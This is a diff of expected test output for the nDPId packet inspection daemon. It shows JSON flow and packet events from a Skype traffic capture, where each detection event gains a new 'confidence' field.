 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4YcMAAEARzb3AqAEi1cezojLdnF0AJAuMnGgC2mPP3NT+NgZcfouOKEVgI\/tI0sJfUuMhDA=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1+dEAAEARBS\/AqAEib91KEDLdnGAAIfCsnGoCw1fhnSu+3d\/Tw+s36JFjatVqYPGvPQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyaGwAAEARx63AqAEinTfrnzLdnFUAHmVKnGwCxXHmKlMo0hJpMwmU59yIG9tJmA=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4pYYAAEARPZvAqAEinTc4kjLdgQkAJLU7nG4Cyw+0E3ewR9IGP0eBLCPkEu6cvusCSULx8g=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2L4AAEARJivAqAEib91KHDLdnE4ALJRcnHACG8tsqKlSc3O3hWaMTNmN0BY4DMi8SBQzDHozUa6r8phn"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLY\/4AAEARkzDAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLbZEAAEARiZ3AqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAAygKMAAEARGILAqAEinTeClDLdnFMAHuO+nHICw5e0uFvnoh7r2z7q0Ash9G6vuA=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA37XsAAEAR+hLAqAEinTg0JTLdnGAAI2eBnHQCCWFRyRLVPOTLcRjYZLb3DOT1DUSOmuDR"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
